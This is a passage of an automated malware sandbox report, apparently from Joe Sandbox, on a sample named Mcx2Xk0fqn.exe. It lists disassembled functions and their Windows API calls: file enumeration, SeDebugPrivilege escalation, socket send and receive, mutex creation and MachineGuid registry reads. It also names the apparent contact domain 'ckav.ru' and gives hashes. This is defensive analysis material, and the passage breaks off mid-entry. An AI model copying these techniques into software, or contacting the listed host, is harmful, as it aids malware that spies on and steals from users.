Opcode ID: 2da33014e2b2c60a70b413e431b8f632356b6c8e9a4e8699f3e04616446af57c
Instruction ID: f2d704400a372f5231d17058e6ef3228301dda84e60188dd720ea370caa14b8b
Opcode Fuzzy Hash: 2da33014e2b2c60a70b413e431b8f632356b6c8e9a4e8699f3e04616446af57c
Instruction Fuzzy Hash: 8EB1BE70B091248FCB04CB68C990AADFBB7EF89314F68D55AD49AAB355D730DD02CB94

Function 00E761A0 Relevance: .2, Instructions: 187COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1654514055.0000000000E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_Mcx2Xk0fqn.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2dfa6f5498e93f16da0f227f47f71a07cab90fc5f69dd8d3da8167de57f25954
Instruction ID: 5e23c28bfde6409f3360b8d36aad08646166c526024c46f36fb9468a6dfdaa4c
Opcode Fuzzy Hash: 2dfa6f5498e93f16da0f227f47f71a07cab90fc5f69dd8d3da8167de57f25954
Instruction Fuzzy Hash: 1D610630B055158FCB04CB68C9916AEBBB7AF85308F25D526D80AEB795DB31DC069B80

Function 00E741F0 Relevance: .1, Instructions: 124COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1654514055.0000000000E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_Mcx2Xk0fqn.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ae42d45438badfecfeae0aa237641c3630c68586fbf42fb3b31f7e34b26552ae
Instruction ID: 9f31c259a34fdd6820c363e9aeb85b47a4d5ff59f0526f2db7c7a2546591857b
Opcode Fuzzy Hash: ae42d45438badfecfeae0aa237641c3630c68586fbf42fb3b31f7e34b26552ae
Instruction Fuzzy Hash: 9741EC72F1819A8FCB44DF59E9414AABBB5BBC9300B55E027E40DFB7A2C334CA109B51

Function 00E73728 Relevance: .1, Instructions: 122COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1654514055.0000000000E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_Mcx2Xk0fqn.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: be0f42e20fd5bea87f321c0cb457e004dccbfa74191853b0c43734da6bb257e8
Instruction ID: a6b88eba1e94600bd9129c89d6675b58f48993c36a8abb9b4c4e81ac3c6fb558
Opcode Fuzzy Hash: be0f42e20fd5bea87f321c0cb457e004dccbfa74191853b0c43734da6bb257e8
Instruction Fuzzy Hash: 5841E5B5614246CFC798CB79C9815ABB7F2EB84310B24D97BD06EEB650C334DA41EB11

Function 00E73738 Relevance: .1, Instructions: 121COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1654514055.0000000000E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_Mcx2Xk0fqn.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c3667c241b0be10b676abcdfca62e82eb8d18f848b47883a0ffb02889382b271
Instruction ID: 4bc143f5c524fb8ba0088162432c58d811fa2e1ef3154dd97bea63bed2b71ca5
Opcode Fuzzy Hash: c3667c241b0be10b676abcdfca62e82eb8d18f848b47883a0ffb02889382b271
Instruction Fuzzy Hash: D041D6B5710206CFD798CA79C9816A7B7E6FB84311B24D93BD02EEB650C730DA41EB11

Function 00E74200 Relevance: .1, Instructions: 120COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1654514055.0000000000E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_Mcx2Xk0fqn.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 32ff79629a8d6444cc454e913228c1e35bc421329365323cb0d4ff9f4de36cc5
Instruction ID: 569533711211fae0cc81c631cc2afac2c6eddfdd5bbdcb90d3171428f5b7e3e4
Opcode Fuzzy Hash: 32ff79629a8d6444cc454e913228c1e35bc421329365323cb0d4ff9f4de36cc5
Instruction Fuzzy Hash: 4541DA72F1429A8F8B44DF99E9414AAB6B5BBC9300F55E026E40DFB7A1C334DA109B51

Analysis Process: Mcx2Xk0fqn.exePID: 7304, Parent PID: 7272COMMON

Execution Graph

Execution Coverage:	31.6%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	4.4%
Total number of Nodes:	1846
Total number of Limit Nodes:	93

Executed Functions

Function 00403D74 Relevance: 14.2, APIs: 4, Strings: 4, Instructions: 200
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindFirstFileW.KERNELBASE(00000000,?,00000000,D4F4ACEA,00000000,00000000,00000001,00000000,00000000), ref: 00403DC4
FindNextFileW.KERNELBASE(00000000,00000010,00000000,CE4477CC,00000000,00000000), ref: 00403E8C
FindFirstFileW.KERNELBASE(00000000,?,00000000,D4F4ACEA,00000000,00000000,00000001,00000000,00000000), ref: 00403EDB
FindNextFileW.KERNELBASE(00000000,00000010,00000000,CE4477CC,00000000,00000000), ref: 00403F58

Strings

Program Files, xrefs: 00403E01
Windows, xrefs: 00403DEA
%s\*, xrefs: 00403D99
%s\%s, xrefs: 00403E3A, 00403EAF, 00403F1C

Memory Dump Source

Source File: 00000001.00000002.1683652068.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Mcx2Xk0fqn.jbxd

Yara matches

Similarity

API ID: FileFind$FirstNext
String ID: %s\%s$%s\*$Program Files$Windows
API String ID: 1690352074-2009209621
Opcode ID: 1e3e6a10e2b9ec909b5a5a789c8a5300318a12692afde49798013ba2296699ae
Instruction ID: acb13e71dd503001dda9649917d64d786dba47cd8022a2b45c5045a1a8a297e9
Opcode Fuzzy Hash: 1e3e6a10e2b9ec909b5a5a789c8a5300318a12692afde49798013ba2296699ae
Instruction Fuzzy Hash: A651F3329006197AEB14AEB4DD8AFAB3B6CDB45719F10013BF404B51C1EA7CEF80865C

Function 0040650A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,SeDebugPrivilege,?,00000009,C6C3ECBB,00000000,00000000,?,00000000,?,?,?,?,?,0040F9DC), ref: 0040654E
AdjustTokenPrivileges.KERNELBASE(?,00000000,?,00000010,00000000,00000000,00000009,C1642DF2,00000000,00000000,00000000,?,00000000), ref: 00406589

Strings

SeDebugPrivilege, xrefs: 00406548

Memory Dump Source

Source File: 00000001.00000002.1683652068.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Mcx2Xk0fqn.jbxd

Yara matches

Similarity

API ID: AdjustLookupPrivilegePrivilegesTokenValue
String ID: SeDebugPrivilege
API String ID: 3615134276-2896544425
Opcode ID: e2948c256eaff89fcf02f3bc2ef1638e4caf3df8a7acb90b2cc554f1a6e3f5aa
Instruction ID: 1578144bc241a5b33ff73db231d5495ab0f4fd5df9d31338026c5631bf24f4b3
Opcode Fuzzy Hash: e2948c256eaff89fcf02f3bc2ef1638e4caf3df8a7acb90b2cc554f1a6e3f5aa
Instruction Fuzzy Hash: A1117331A00219BAD710EEA79D4AEAF7ABCDBCA704F10006EB504F6181EE759B018674

Function 00402B7C Relevance: 3.0, APIs: 2, Instructions: 20memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,?,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E), ref: 00402B85
RtlAllocateHeap.NTDLL(00000000,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E,00000000), ref: 00402B8C

Memory Dump Source

Source File: 00000001.00000002.1683652068.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Mcx2Xk0fqn.jbxd

Yara matches

Similarity

API ID: Heap$AllocateProcess
String ID:
API String ID: 1357844191-0
Opcode ID: 06d42fc3960a44692cfa347aceea0432181886377ca781978571395af1b358ed
Instruction ID: b98118a04cfb303fc975c2cf6dbcabe8739d57b69ee549b18d4bacd194132a09
Opcode Fuzzy Hash: 06d42fc3960a44692cfa347aceea0432181886377ca781978571395af1b358ed
Instruction Fuzzy Hash: 14D05E36A01A24B7CA212FD5AC09FCA7F2CEF48BE6F044031FB0CAA290D675D91047D9

Function 00404ED4 Relevance: 1.5, APIs: 1, Instructions: 9networkCOMMON

Download Yara Rule

APIs

recv.WS2_32(00000000,00000000,00000FD0,00000000), ref: 00404EE2

Memory Dump Source

Source File: 00000001.00000002.1683652068.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Mcx2Xk0fqn.jbxd

Yara matches

Similarity

API ID: recv
String ID:
API String ID: 1507349165-0
Opcode ID: 21ce8f986ded34978476a8ad781d548340edbce2afa6bcd3c515a11396da2d1b
Instruction ID: cd18cecc4e97c8ae47002f9e4185d290addc31a5a75b3629954b28b764c5713b
Opcode Fuzzy Hash: 21ce8f986ded34978476a8ad781d548340edbce2afa6bcd3c515a11396da2d1b
Instruction Fuzzy Hash: 6EC0483204020CFBCF025F81EC05BD93F2AFB48760F448020FA1818061C772A520AB88

Function 004061C3 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 151
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetLastError.KERNEL32(?,?,?,?,?,?,00414449), ref: 004061F4
_wmemset.LIBCMT ref: 00406244
_wmemset.LIBCMT ref: 00406261
GetTokenInformation.KERNELBASE(IDA,00000001,00000000,00000000,?,00000009,ECAE3497,00000000,00000000,00000000), ref: 0040628C

Strings

IDA, xrefs: 004061E5, 00406276, 004062AC, 0040621D, 004061E8, 00406220, 0040628B
IDA, xrefs: 00406304

Memory Dump Source

Source File: 00000001.00000002.1683652068.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Mcx2Xk0fqn.jbxd

Yara matches

Similarity

API ID: _wmemset$ErrorInformationLastToken
String ID: IDA$IDA
API String ID: 487585393-2020647798
Opcode ID: 64a5c42e22f073721f8dd171e99ae32576dde97d35dca3661b3250748495049d
Instruction ID: 96d4363135ba53d30ed73ccdf96fe48b30064626948d25b168d4296351bbaec2
Opcode Fuzzy Hash: 64a5c42e22f073721f8dd171e99ae32576dde97d35dca3661b3250748495049d
Instruction Fuzzy Hash: 6641B372900206BAEB10AFE69C46EEF7B7CDF95714F11007FF901B61C1EE799A108668

Function 00404E17 Relevance: 7.6, APIs: 5, Instructions: 72
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

getaddrinfo.WS2_32(00000000,00000001,?,00000000), ref: 00404E4F
socket.WS2_32(?,?,?), ref: 00404E7A
freeaddrinfo.WS2_32(00000000), ref: 00404E90

Memory Dump Source

Source File: 00000001.00000002.1683652068.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Mcx2Xk0fqn.jbxd

Yara matches

Similarity

API ID: freeaddrinfogetaddrinfosocket
String ID:
API String ID: 2479546573-0
Opcode ID: 324a94be1e2a93b2d6943f125fe3df56ade79f34f6962390557e9620afcccf0f
Instruction ID: d63855dbb6a3d3c0c8ebf90f2bb9ce8455fd2b7eef63007fec5ba55d39dacf84
Opcode Fuzzy Hash: 324a94be1e2a93b2d6943f125fe3df56ade79f34f6962390557e9620afcccf0f
Instruction Fuzzy Hash: 9621BBB2500109FFCB106FA0ED49ADEBBB5FF88315F20453AF644B11A0C7399A919B98

Function 004040BB Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 129
filememoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNELBASE(00000000,80000000,00000001,00000000,00000003,00000080,00000000,00000000,E9FABB88,00000000,00000000,00000000,00000001,00000000), ref: 004040E8
VirtualAlloc.KERNELBASE(00000000,00000000,00001000,00000004,00000000,D4EAD4E2,00000000,00000000), ref: 0040413A
ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,00000000,00000000,CD0C9940,00000000,00000000), ref: 0040415A

Strings

.tmp, xrefs: 00404196

Memory Dump Source

Source File: 00000001.00000002.1683652068.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Mcx2Xk0fqn.jbxd

Yara matches

Similarity

API ID: File$AllocCreateReadVirtual
String ID: .tmp
API String ID: 3585551309-2986845003
Opcode ID: 9631e6f5e9699617cd127c849230d2104622380ed218987cebf5414177a879fc
Instruction ID: b436c3373f33a6751ef3154d9799880e4ac32c23f8ae8b62b11f674aa4b57f97
Opcode Fuzzy Hash: 9631e6f5e9699617cd127c849230d2104622380ed218987cebf5414177a879fc
Instruction Fuzzy Hash: 2C31F87150112477D721AE664C49FDF7E6CDFD67A4F10003AFA08BA2C1DA799B41C2E9

Function 00413866 Relevance: 4.6, APIs: 3, Instructions: 147synchronizationCOMMON

Download Yara Rule

APIs

SetErrorMode.KERNELBASE(00000003,00000000,D1E96FCD,00000000,00000000,00000000,00000000), ref: 00413885
CreateMutexW.KERNELBASE(00000000,00000001,00000000,00000000,CF167DF4,00000000,00000000), ref: 0041399C
GetLastError.KERNEL32 ref: 0041399E

Memory Dump Source

Source File: 00000001.00000002.1683652068.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Mcx2Xk0fqn.jbxd

Yara matches

Similarity

API ID: Error$CreateLastModeMutex
String ID:
API String ID: 3448925889-0
Opcode ID: 5dd40e4cfd1fe52203b1fe5968f304513c4092ad3980e50a04d496178e49115f
Instruction ID: 7738172b6d33d5602fc402945caed90a0cea100ae195543e4e9fee3f6653e559
Opcode Fuzzy Hash: 5dd40e4cfd1fe52203b1fe5968f304513c4092ad3980e50a04d496178e49115f
Instruction Fuzzy Hash: 11415E61964348A8EB10ABF1AC82EFFA738EF54755F10641FF504F7291E6794A80836E

Function 004042CF Relevance: 4.6, APIs: 3, Instructions: 60fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE(00000000,C0000000,00000000,00000000,00000004,00000080,00000000,00000000,E9FABB88,00000000,00000000,00000000,00000001,?,?,004146E2), ref: 004042F9
SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000002,00000000,EEBAAE5B,00000000,00000000,?,?,004146E2,00000000,00000000,?,00000000,00000000), ref: 00404314
WriteFile.KERNELBASE(00000000,?,00000000,00000000,00000000,00000000,C148F916,00000000,00000000,?,?,004146E2,00000000,00000000,?,00000000), ref: 00404334

Memory Dump Source

Source File: 00000001.00000002.1683652068.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Mcx2Xk0fqn.jbxd

Yara matches

Similarity

API ID: File$CreatePointerWrite
String ID:
API String ID: 3672724799-0
Opcode ID: b52d99f42f68723aef5fd834f3fc6c8fdb7b2d5b4e411be9fbae0770ffe78be6
Instruction ID: 60e70a0f6cedc7b52d1efda55ce7422740d02a59a4e71dca7f773cbcdc95941a
Opcode Fuzzy Hash: b52d99f42f68723aef5fd834f3fc6c8fdb7b2d5b4e411be9fbae0770ffe78be6
Instruction Fuzzy Hash: 2F014F315021343AD6356A679C0EEEF6D5DDF8B6B5F10422AFA18B60D0EA755B0181F8

Function 00412D31 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 178threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNELBASE(00000000,00000000,0041289A,00000000,00000000,?,00000000,FCAE4162,00000000,00000000,?,?,?,?,00000001,00000000), ref: 00412F53

Part of subcall function 0040632F: _wmemset.LIBCMT ref: 0040634F

Part of subcall function 00402BAB: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00402BB9
Part of subcall function 00402BAB: HeapFree.KERNEL32(00000000), ref: 00402BC0

Strings

ckav.ru, xrefs: 00412D96

Memory Dump Source

Source File: 00000001.00000002.1683652068.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Mcx2Xk0fqn.jbxd

Yara matches

Similarity

API ID: Heap$CreateFreeProcessThread_wmemset
String ID: ckav.ru
API String ID: 2915393847-2696028687
Opcode ID: eacd1f59d46a33f08cf175cca3b3b274a2abcb1d178fb3fa8030531899280e62
Instruction ID: 4531c2d42d5f5f74382d08a8027233dc497c0745a20cb628f46216a694decd77
Opcode Fuzzy Hash: eacd1f59d46a33f08cf175cca3b3b274a2abcb1d178fb3fa8030531899280e62
Instruction Fuzzy Hash: 7751B7728005047EEA113B62DD4ADEB3669EB2034CB54423BFC06B51B2E67A4D74DBED

Function 0040632F Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 35COMMON

Download Yara Rule

APIs

Part of subcall function 00402B7C: GetProcessHeap.KERNEL32(00000000,?,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E), ref: 00402B85
Part of subcall function 00402B7C: RtlAllocateHeap.NTDLL(00000000,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E,00000000), ref: 00402B8C

_wmemset.LIBCMT ref: 0040634F

Strings

CA, xrefs: 00406354, 0040635A

Memory Dump Source

Source File: 00000001.00000002.1683652068.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Mcx2Xk0fqn.jbxd

Yara matches

Similarity

API ID: Heap$AllocateProcess_wmemset
String ID: CA
API String ID: 2773065342-1052703068
Opcode ID: 4afda30c811b228529c54d72888b6e374887d4959eaca369bf1b72bc4a37c641
Instruction ID: fc433e2548431d42ded6bbe1dab57db4bffb986d933035261d01f02eae51e62b
Opcode Fuzzy Hash: 4afda30c811b228529c54d72888b6e374887d4959eaca369bf1b72bc4a37c641
Instruction Fuzzy Hash: 0FE09B62A4511477D121A9665C06EAF76AC8F41B64F11017FFC05B62C1E9BC9E1101FD

Function 00406086 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 15COMMON

Download Yara Rule

APIs

GetTokenInformation.KERNELBASE(?,00000000,00000001,?,004062B4,00000009,ECAE3497,00000000,00000000,IDA,004062B4,IDA,00000001,00000000,?,?), ref: 004060A8

Strings

IDA, xrefs: 00406086

Memory Dump Source

Source File: 00000001.00000002.1683652068.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Mcx2Xk0fqn.jbxd

Yara matches

Similarity

API ID: InformationToken
String ID: IDA
API String ID: 4114910276-365204570
Opcode ID: 947dba5d192e13df99ca19526492baac9a77df32751a8a878116f3f8cb9ab45e
Instruction ID: 313645685f6ff1854c13b9bf72d10cc52e042395484f5c11e0c3c7a214e99d66
Opcode Fuzzy Hash: 947dba5d192e13df99ca19526492baac9a77df32751a8a878116f3f8cb9ab45e
Instruction Fuzzy Hash: F4D0C93214020DBFEF025EC1DC02F993F2AAB08754F008410BB18280E1D6B39670AB95

Function 00402C03 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 13libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNELBASE(?,s1@,00000000,CEB18ABC,00000000,00000000,?,00403173,?,00000000), ref: 00402C1B

Strings

s1@, xrefs: 00402C15

Memory Dump Source

Source File: 00000001.00000002.1683652068.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Mcx2Xk0fqn.jbxd

Yara matches

Similarity

API ID: AddressProc
String ID: s1@
API String ID: 190572456-427247929
Opcode ID: 111d3fe3cf3de278b88478875a5240f52c9cc91b538b26207c7303d9e6a3f6a3
Instruction ID: 1fbf97b0b55819c82851c7ea3a697f1c0796d20c97a22cfecd58a5260392007e
Opcode Fuzzy Hash: 111d3fe3cf3de278b88478875a5240f52c9cc91b538b26207c7303d9e6a3f6a3
Instruction Fuzzy Hash: A5C048B10142087EAE016EE19C05CBB3F5EEA44228B008429BD18E9122EA3ADE2066A4

Function 00404A52 Relevance: 3.1, APIs: 2, Instructions: 63registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00402B7C: GetProcessHeap.KERNEL32(00000000,?,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E), ref: 00402B85
Part of subcall function 00402B7C: RtlAllocateHeap.NTDLL(00000000,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E,00000000), ref: 00402B8C

RegOpenKeyExA.KERNELBASE(00000032,?,00000000,00020119,00000000,00000009,F4B4ACDC,00000000,00000000,MachineGuid,00000032,00000000,00413DA5,00413987), ref: 00404A9A
RegQueryValueExA.KERNELBASE(?,00000000,00000000,00000000,00000000,00000009,00000009,FE9F661A,00000000,00000000), ref: 00404ABC

Memory Dump Source

Source File: 00000001.00000002.1683652068.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Mcx2Xk0fqn.jbxd

Yara matches

Similarity

API ID: Heap$AllocateOpenProcessQueryValue
String ID:
API String ID: 1425999871-0
Opcode ID: bcb9612233ffeb4634d4995e45ab0b963c80d9ccd10657b8c49858d8039cb957
Instruction ID: c751ae4fb1a51baa23b068920df28fa5e45e9ad9ad003da97b765f6d6e9ada80
Opcode Fuzzy Hash: bcb9612233ffeb4634d4995e45ab0b963c80d9ccd10657b8c49858d8039cb957
Instruction Fuzzy Hash: A301B1B264010C7EEB01AED69C86DBF7B2DDB81798B10003EF60475182EAB59E1156B9

Function 004060BD Relevance: 1.6, APIs: 1, Instructions: 53COMMON

Download Yara Rule

APIs

CheckTokenMembership.KERNELBASE(00000000,00000000,00000000,00000009,E3B938DF,00000000,00000000,00000001), ref: 00406115

Memory Dump Source

Source File: 00000001.00000002.1683652068.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Mcx2Xk0fqn.jbxd

Yara matches

Similarity

API ID: CheckMembershipToken
String ID:
API String ID: 1351025785-0
Opcode ID: 4a43c4ed47dff20a0e63da0344eb6b70d0e7b4795f78c2e23bdd5dfdab477f71
Instruction ID: 8b780b9e56efd5f2a9a2252a5f210822aeafba94d0ba5a8497d60ad8274f78a0
Opcode Fuzzy Hash: 4a43c4ed47dff20a0e63da0344eb6b70d0e7b4795f78c2e23bdd5dfdab477f71
Instruction Fuzzy Hash: 7801867195020DBEEB00EBE59C86EFFB77CEF08208F100569B515B60C2EA75AF008764

Function 00403C62 Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

CreateDirectoryW.KERNELBASE(00413D1F,00000000,00000000,C8F0A74D,00000000,00000000,00000000,?,00413D1F,00000000), ref: 00403C8B

Memory Dump Source

Source File: 00000001.00000002.1683652068.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Mcx2Xk0fqn.jbxd

Yara matches

Similarity

API ID: CreateDirectory
String ID:
API String ID: 4241100979-0
Opcode ID: d413ab25134c4b1c761ae7c40b175d3f6038492197e92d4c0305fa2d5b60993a
Instruction ID: 8def336d827aa123259dd30fe2d1f4df156212ecddfe904d71fbacf529eca846
Opcode Fuzzy Hash: d413ab25134c4b1c761ae7c40b175d3f6038492197e92d4c0305fa2d5b60993a
Instruction Fuzzy Hash: 47D05E320450687A9A202AA7AC08CDB3E0DDE032FA7004036B81CE4052DB26861191E4

Function 0040642C Relevance: 1.5, APIs: 1, Instructions: 18COMMON

Download Yara Rule

APIs

GetNativeSystemInfo.KERNELBASE(?,00000000,E9AF4586,00000000,00000000,?,?,?,?,004144CF,00000000,00000000,00000000,00000000), ref: 00406445

Memory Dump Source

Source File: 00000001.00000002.1683652068.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Mcx2Xk0fqn.jbxd

Yara matches

Similarity

API ID: InfoNativeSystem
String ID:
API String ID: 1721193555-0
Opcode ID: 18b792e9f3ed795f2423495cf2abf5b642ecf28d7d26812d11fe043f37d9eb75
Instruction ID: 89a273ea7bbabd9d74fc824e7d15e3b55fbc967ee531cdb223f62f0d5b23fb21
Opcode Fuzzy Hash: 18b792e9f3ed795f2423495cf2abf5b642ecf28d7d26812d11fe043f37d9eb75
Instruction Fuzzy Hash: 60D0C9969142082A9B24FEB14E49CBB76EC9A48104B400AA8FC05E2180FD6ADF5482A5

Function 00404EEA Relevance: 1.5, APIs: 1, Instructions: 16networkCOMMON

Download Yara Rule

APIs

send.WS2_32(00000000,00000000,00000000,00000000), ref: 00404F07

Memory Dump Source

Source File: 00000001.00000002.1683652068.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Mcx2Xk0fqn.jbxd

Yara matches

Similarity

API ID: send
String ID:
API String ID: 2809346765-0
Opcode ID: f5f37575630baef1eb429ccea87373dc8bd2737f5fb4b11d46726e1bb86e5636
Instruction ID: 973ad19c2726000f66dbac5dad6f1ecaf56acd36cc9bde1755ab86a88c27f217
Opcode Fuzzy Hash: f5f37575630baef1eb429ccea87373dc8bd2737f5fb4b11d46726e1bb86e5636
Instruction Fuzzy Hash: F8D09231140209BBEF016E55EC05BAA3B69EF44B54F10C026BA18991A1DB31A9219A98

Function 00403BD0 Relevance: 1.5, APIs: 1, Instructions: 14COMMON

Download Yara Rule

APIs

MoveFileExW.KERNELBASE(00000000,00412C16,?,00000000,C9143177,00000000,00000000,?,004040B6,00000000,00412C16,00000001,?,00412C16,00000000,00000000), ref: 00403BEB

Memory Dump Source

Source File: 00000001.00000002.1683652068.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Mcx2Xk0fqn.jbxd

Yara matches

Similarity

API ID: FileMove
String ID:
API String ID: 3562171763-0
Opcode ID: 7a0bb135e6e1f0606704ed46507384a8cac74e7a8e8860f1f6d7d5715d4ca302
Instruction ID: 27267517ebbd606c040c475238707358b0366275ca1c9c11413b547716cf2561
Opcode Fuzzy Hash: 7a0bb135e6e1f0606704ed46507384a8cac74e7a8e8860f1f6d7d5715d4ca302
Instruction Fuzzy Hash: 5AC04C7500424C7FEF026EF19D05C7B3F5EEB49618F448825BD18D5421DA37DA216664

Function 00404DF3 Relevance: 1.5, APIs: 1, Instructions: 13networkCOMMON

Download Yara Rule

APIs

WSAStartup.WS2_32(00000202,?), ref: 00404E08

Memory Dump Source

Source File: 00000001.00000002.1683652068.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Mcx2Xk0fqn.jbxd

Yara matches

Similarity

API ID: Startup
String ID:
API String ID: 724789610-0
Opcode ID: aec8cb7098972fa6752499418e154eb0e8b54166df737fc870e0652f0f0fb75e
Instruction ID: edfb6e6a7b2c2d2c81179f298452045bbfcf768a57aceb16f5d93ae35c4528ea
Opcode Fuzzy Hash: aec8cb7098972fa6752499418e154eb0e8b54166df737fc870e0652f0f0fb75e
Instruction Fuzzy Hash: 6EC08C32AA421C9FD750AAB8AD0FAF0B7ACD30AB02F0002B56E1DC60C1E550582906E2

Function 0040427D Relevance: 1.5, APIs: 1, Instructions: 13COMMON

Download Yara Rule

APIs

SetFileAttributesW.KERNELBASE(00000000,00002006,00000000,CAC5886E,00000000,00000000,?,00412C3B,00000000,00000000,?), ref: 00404297

Memory Dump Source

Source File: 00000001.00000002.1683652068.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Mcx2Xk0fqn.jbxd

Yara matches

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 8dd52a8075b7bef316d0fc581140073ef821e073e46509cdb91d5efed9f2b539
Instruction ID: e837d3b0865cda380a04769d40cc561620ee701a25bf2a33446201ee5459e2a9
Opcode Fuzzy Hash: 8dd52a8075b7bef316d0fc581140073ef821e073e46509cdb91d5efed9f2b539
Instruction Fuzzy Hash: A9C092B054430C3EFA102EF29D4AD3B3A8EEB41648B008435BE08E9096E977DE2061A8

Function 00404A19 Relevance: 1.5, APIs: 1, Instructions: 13registryCOMMON

Download Yara Rule

APIs

